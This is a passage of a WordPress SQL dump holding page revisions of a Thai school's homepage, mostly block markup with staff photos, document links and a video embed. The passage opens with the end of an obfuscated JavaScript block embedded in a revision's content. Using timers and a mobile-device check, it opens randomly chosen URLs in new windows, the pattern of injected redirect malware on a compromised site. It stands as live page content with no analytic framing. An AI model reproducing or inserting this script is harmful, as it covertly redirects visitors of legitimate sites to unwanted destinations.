_0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:06:29','2025-07-15 09:06:29','',19,'http://watprato.ssk.in.th/?p=705',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(706,1,'2025-07-15 16:07:35','2025-07-15 09:07:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" 